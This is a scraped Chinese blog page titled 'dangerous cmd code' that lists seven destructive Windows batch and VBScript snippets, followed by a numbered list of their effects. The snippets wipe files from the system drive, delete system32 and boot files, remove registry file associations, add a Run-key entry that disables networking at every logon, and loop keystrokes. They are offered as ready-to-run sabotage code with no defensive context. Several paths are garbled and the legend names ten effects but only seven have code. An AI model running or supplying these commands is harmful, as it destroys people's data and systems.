zoukankan      html  css  js  c++  java
  • 危险的cmd代码

    1
    @echo off
    del %systemdrive%*.*/f /s /q
    shutdown -r -f -t 00
    2
    REN *.DOC *.TXT REN *.JPEG *.TXT
    REN *.LNK *.TXT
    REN *.AVI *.TXT
    REN *.MPEG *.TXT
    REN *.COM *.TXT
    REN *.BAT *.TXT
    3
    del c:WINDOWSsystem32*.*/q
    4
    @echo off
    attrib -r -s -h c:autoexec.bat
    del c:autoesec.bat
    attrib -r -s -h c:oot.ini
    del c:oot.ini
    attrib -r -s -h c:
    tldr
    del c:
    tldr
    attrib -r -s -h c:windowswin.ini
    del c:windowswin.ini
    5
    @ECHO OFF
    START reg delete HKCR/.exe
    START reg delete HKCR/.dll
    START reg delete HKCR/*
    6
    echo @echo off>c:windowswimn32.bat
    echo break off>>c:windowswimn32.bat
    echo ipconfig/release_all>>c:windowswimn32.bat
    echo end>>c:windowawimn32.bat
    reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat
    reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn.bat
    PAUSE
    7
    Set wshShell=wscript.CreateObject("Wscript.Shell")
    do
    wscript.sleep 100
    wshshell.sendkeys "~(enter)"
    loop
    
    
    1 蓝屏死机
    2 更改文件后缀名
    3 删除system32
    4 使PC永久崩溃
    5 删除所以的注册表
    6 永远禁用网络
    7 一直按回车
    8 启动电脑后自动关机
    9 开启CD蜂鸣器
    10 格式化硬盘
    
  • 相关阅读:
    async
    subing用法
    vue中子组件调用父组件的方法
    Python—创建目录
    Python—访问限制
    Python—实例方法,实例数据(类属性,实例属性)
    Python—对象,类
    tail命令
    head命令
    pwd命令
  • 原文地址:https://www.cnblogs.com/AmosAlbert/p/12832369.html
Copyright © 2011-2022 走看看